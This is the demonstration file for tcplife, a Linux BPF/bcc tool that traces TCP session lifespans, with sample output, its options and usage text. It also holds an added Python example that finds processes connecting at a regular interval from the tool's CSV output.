Demonstrations of tcplife, the Linux BPF/bcc version.


tcplife summarizes TCP sessions that open and close while tracing. For example:

# ./tcplife
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
22597 recordProg 127.0.0.1       46644 127.0.0.1       28527     0     0 0.23
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46644     0     0 0.28
22598 curl       100.66.3.172    61620 52.205.89.26    80        0     1 91.79
22604 curl       100.66.3.172    44400 52.204.43.121   80        0     1 121.38
22624 recordProg 127.0.0.1       46648 127.0.0.1       28527     0     0 0.22
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46648     0     0 0.27
22647 recordProg 127.0.0.1       46650 127.0.0.1       28527     0     0 0.21
3277  redis-serv 127.0.0.1       28527 127.0.0.1       46650     0     0 0.26
[...]

This caught a program, "recordProg", making a few short-lived TCP connections
to "redis-serv", each lasting about 0.25 milliseconds. A couple of "curl"
sessions were also traced, connecting to port 80, and lasting 91 and 121
milliseconds.

This tool is useful for workload characterisation and flow accounting:
identifying what connections are happening, with the bytes transferred.


Process names are truncated to 10 characters. By using the wide option, -w,
the column width becomes 16 characters. The IP address columns are also wider
to fit IPv6 addresses:

# ./tcplife -w
PID   COMM             IP LADDR                      LPORT RADDR                      RPORT  TX_KB  RX_KB MS
26315 recordProgramSt  4  127.0.0.1                  44188 127.0.0.1                  28527      0      0 0.21
3277  redis-server     4  127.0.0.1                  28527 127.0.0.1                  44188      0      0 0.26
26320 ssh              6  fe80::8a3:9dff:fed5:6b19   22440 fe80::8a3:9dff:fed5:6b19   22         1      1 457.52
26321 sshd             6  fe80::8a3:9dff:fed5:6b19   22    fe80::8a3:9dff:fed5:6b19   22440      1      1 458.69
26341 recordProgramSt  4  127.0.0.1                  44192 127.0.0.1                  28527      0      0 0.27
3277  redis-server     4  127.0.0.1                  28527 127.0.0.1                  44192      0      0 0.32


In this example, I uploaded a 10 Mbyte file to the server, and then downloaded
it again, using scp:

# ./tcplife
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
7715  recordProg 127.0.0.1       50894 127.0.0.1       28527     0     0 0.25
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50894     0     0 0.30
7619  sshd       100.66.3.172    22    100.127.64.230  63033     5 10255 3066.79
7770  recordProg 127.0.0.1       50896 127.0.0.1       28527     0     0 0.20
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50896     0     0 0.24
7793  recordProg 127.0.0.1       50898 127.0.0.1       28527     0     0 0.23
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50898     0     0 0.27
7847  recordProg 127.0.0.1       50900 127.0.0.1       28527     0     0 0.24
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50900     0     0 0.29
7870  recordProg 127.0.0.1       50902 127.0.0.1       28527     0     0 0.29
3277  redis-serv 127.0.0.1       28527 127.0.0.1       50902     0     0 0.30
7798  sshd       100.66.3.172    22    100.127.64.230  64925 10265     6 2176.15
[...]

You can see the 10 Mbytes received by sshd, and then later transmitted. Looks
like receive was slower (3.07 seconds) than transmit (2.18 seconds).


Timestamps can be added with -t:

# ./tcplife -t
TIME(s)   PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
0.000000  5973  recordProg 127.0.0.1       47986 127.0.0.1       28527     0     0 0.25
0.000059  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47986     0     0 0.29
1.022454  5996  recordProg 127.0.0.1       47988 127.0.0.1       28527     0     0 0.23
1.022513  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47988     0     0 0.27
2.044868  6019  recordProg 127.0.0.1       47990 127.0.0.1       28527     0     0 0.24
2.044924  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47990     0     0 0.28
3.069136  6042  recordProg 127.0.0.1       47992 127.0.0.1       28527     0     0 0.22
3.069204  3277  redis-serv 127.0.0.1       28527 127.0.0.1       47992     0     0 0.28

This shows that the recordProg process was connecting once per second.

There's also a -T for HH:MM:SS formatted times.


There's a comma separated values mode, -s. Here it is with both -t and -T
timestamps:

# ./tcplife -stT
TIME,TIME(s),PID,COMM,IP,LADDR,LPORT,RADDR,RPORT,TX_KB,RX_KB,MS
23:39:38,0.000000,7335,recordProgramSt,4,127.0.0.1,48098,127.0.0.1,28527,0,0,0.26
23:39:38,0.000064,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48098,0,0,0.32
23:39:39,1.025078,7358,recordProgramSt,4,127.0.0.1,48100,127.0.0.1,28527,0,0,0.25
23:39:39,1.025141,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48100,0,0,0.30
23:39:41,2.040949,7381,recordProgramSt,4,127.0.0.1,48102,127.0.0.1,28527,0,0,0.24
23:39:41,2.041011,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48102,0,0,0.29
23:39:42,3.067848,7404,recordProgramSt,4,127.0.0.1,48104,127.0.0.1,28527,0,0,0.30
23:39:42,3.067914,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48104,0,0,0.35
[...]
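
The once-per-second cadence noted for recordProg under -t can be derived
mechanically from the -stT CSV output, which is useful when reviewing flow
records for processes that connect out on a fixed schedule. The following
Python is an added example, not part of bcc; the function name periodic_flows
and its thresholds are assumptions chosen for illustration.

```python
import csv
import io
from collections import defaultdict
from statistics import mean, pstdev

# Constructed input: the header and rows from the -stT output above.
SAMPLE = """\
TIME,TIME(s),PID,COMM,IP,LADDR,LPORT,RADDR,RPORT,TX_KB,RX_KB,MS
23:39:38,0.000000,7335,recordProgramSt,4,127.0.0.1,48098,127.0.0.1,28527,0,0,0.26
23:39:38,0.000064,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48098,0,0,0.32
23:39:39,1.025078,7358,recordProgramSt,4,127.0.0.1,48100,127.0.0.1,28527,0,0,0.25
23:39:39,1.025141,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48100,0,0,0.30
23:39:41,2.040949,7381,recordProgramSt,4,127.0.0.1,48102,127.0.0.1,28527,0,0,0.24
23:39:41,2.041011,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48102,0,0,0.29
23:39:42,3.067848,7404,recordProgramSt,4,127.0.0.1,48104,127.0.0.1,28527,0,0,0.30
23:39:42,3.067914,3277,redis-server,4,127.0.0.1,28527,127.0.0.1,48104,0,0,0.35
[...]
"""


def periodic_flows(csv_text, min_sessions=3, max_jitter=0.1):
    """Return (COMM, RADDR, RPORT) groups that recur at a steady interval."""
    # The accepting side sees a new ephemeral RPORT per session, so it never
    # reaches min_sessions in one group and drops out on its own.
    groups = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        try:
            ts = float(row["TIME(s)"])
            kb = int(row["TX_KB"]) + int(row["RX_KB"])
        except (TypeError, ValueError, KeyError):
            continue  # truncated or non-data line such as "[...]"
        groups[(row["COMM"], row["RADDR"], row["RPORT"])].append((ts, kb))

    findings = []
    for (comm, raddr, rport), sessions in sorted(groups.items()):
        if len(sessions) < min_sessions:
            continue
        times = sorted(t for t, _ in sessions)
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = mean(gaps)
        # Coefficient of variation: low values mean a regular cadence.
        if period > 0 and pstdev(gaps) / period <= max_jitter:
            findings.append({"comm": comm, "remote": f"{raddr}:{rport}",
                             "sessions": len(sessions),
                             "period_s": round(period, 2),
                             "total_kb": sum(kb for _, kb in sessions)})
    return findings
```

Calling periodic_flows(SAMPLE) reports recordProgramSt connecting to
127.0.0.1:28527 about every 1.02 seconds; the redis-server rows are ignored.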


There are options for filtering on local and remote ports. Here is filtering
on local ports 22 and 80:

# ./tcplife.py -L 22,80
PID   COMM       LADDR           LPORT RADDR           RPORT TX_KB RX_KB MS
8301  sshd       100.66.3.172    22    100.127.64.230  58671     3     3 1448.52
[...]


USAGE:

# ./tcplife.py -h
usage: tcplife.py [-h] [-T] [-t] [-w] [-s] [-p PID] [-L LOCALPORT]
                  [-D REMOTEPORT] [-4 | -6]

Trace the lifespan of TCP sessions and summarize

optional arguments:
  -h, --help            show this help message and exit
  -T, --time            include time column on output (HH:MM:SS)
  -t, --timestamp       include timestamp on output (seconds)
  -w, --wide            wide column output (fits IPv6 addresses)
  -s, --csv             comma separated values output
  -p PID, --pid PID     trace this PID only
  -L LOCALPORT, --localport LOCALPORT
                        comma-separated list of local ports to trace.
  -D REMOTEPORT, --remoteport REMOTEPORT
                        comma-separated list of remote ports to trace.
  -4, --ipv4            trace IPv4 family only
  -6, --ipv6            trace IPv6 family only

examples:
    ./tcplife           # trace all TCP connect()s
    ./tcplife -t        # include time column (HH:MM:SS)
    ./tcplife -w        # wider columns (fit IPv6)
    ./tcplife -stT      # csv output, with times & timestamps
    ./tcplife -p 181    # only trace PID 181
    ./tcplife -L 80     # only trace local port 80
    ./tcplife -L 80,81  # only trace local ports 80 and 81
    ./tcplife -D 80     # only trace remote port 80
    ./tcplife -4        # only trace IPv4 family
    ./tcplife -6        # only trace IPv6 family
